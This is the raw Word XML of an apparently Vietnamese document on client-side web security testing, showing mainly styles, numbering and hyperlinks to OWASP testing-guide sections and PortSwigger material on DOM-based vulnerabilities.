        <w:t>PortSwigger - DOM-based vulnerabilities</w:t>
      </w:r>
      <w:r w:rsidRPr="000A154C">
        <w:t>: Tài liệu chuyên sâu về DOM XSS, Web Message, và Open Redirect.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C878521" w14:textId="77777777" w:rsidR="00BC1C36" w:rsidRDefault="00BC1C36"/>
    <w:sectPr w:rsidR="00BC1C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612"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AE7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4BD4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8A0A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E06BC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1DE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407D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="89BE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428D3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D97E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45FD1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="26AC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E7B2C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2AE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B38FB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5F5E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079FF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F98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D0600"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C39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D1980"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EA1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9318F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F346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630B3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F36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C282E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="715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A3069"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D1C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00100"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="33E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461F0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0D8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A52C7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D7D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A3799"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="53F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B6A58"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="131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80E09"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="54D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51E10"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="255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E573C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A062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062A9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5CD6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B3ACF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AE70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92C1E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="636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99477">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="120853090">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="453914758">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="592468880">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1118645402">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="2055227016">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1498350823">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="621425812">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="250238492">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1331984186">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="125204563">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1231185342">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1019047101">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1358316590">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="2013530469">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="254367447">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="542639457">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="1869029440">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="2078088294">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="1003583664">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="449709604">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="724791843">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="1823304111">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="980227760">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="1385759310">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="963928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36"/>
    <w:rsid w:val="000A154C"/>
    <w:rsid w:val="00814CC5"/>
    <w:rsid w:val="00BC1C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6934BC-239A-4076-99D0-24093698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36"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00BC1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36"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="00BC1C36"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00BC1C36"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="00BC1C36"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="00BC1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C36"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="00BC1C36"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="000A154C"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="000A1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113-testing-for-html-injection" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.google.com/search?q=%234118-testing-for-cross-site-flashing" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.google.com/search?q=%2341113-testing-for-cross-site-script-inclusion" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/11-Client-side_Testing/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.google.com/search?q=%234112-testing-for-javascript-execution" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.google.com/search?q=%234117-testing-cross-origin-resource-sharing" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.google.com/search?q=%2341112-testing-browser-storage" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.google.com/search?q=%2341111-testing-web-messaging" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.google.com/search?q=%23t%C3%A0i-li%E1%BB%87u-tham-kh%E1%BA%A3o" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.google.com/search?q=%234111-testing-for-dom-based-cross-site-scripting" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.google.com/search?q=%234116-testing-for-client-side-resource-manipulation"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2341110-testing-websockets" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.google.com/search?q=%234115-testing-for-css-injection" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.google.com/search?q=%2341114-testing-for-reverse-tabnabbing" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.google.com/search?q=%234114-testing-for-client-side-url-redirect" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.google.com/search?q=%234119-testing-for-clickjack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1753</Words>
  <Characters>9995</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>83</Lines>
  <Paragraphs>23</Paragraphs>
  <ScaleCrop>false</ScaleCrop>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2026-01-28T18:59:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-01-28T18:59:00Z</dcterms:modified>
</cp:coreProperties>
</file>